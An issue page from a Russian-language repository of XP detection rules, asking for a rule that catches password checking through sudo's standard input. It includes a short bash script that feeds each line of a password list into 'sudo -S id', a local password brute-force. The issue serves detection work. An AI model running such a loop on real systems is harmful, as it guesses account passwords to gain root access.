Security-Experts-Community / open-xp-rules

Открытый репозиторий с правилами на языке eXtraction and Processing (XP)
Apache License 2.0
20 stars 44 forks source link

[OSW#2: Task-9] Подозрительный способ валидации пароля через стандартный поток ввода утилиты sudo #416

Closed AmwNLTL closed 4 months ago

AmwNLTL commented 4 months ago

Приведу в пример небольшой скрипт:

#!/bin/bash

while IFS="" read -r p || [ -n "$p" ]
do
  printf '%s\n' "$p" | sudo -S id
done <  passwords_list.txt

Resolves #374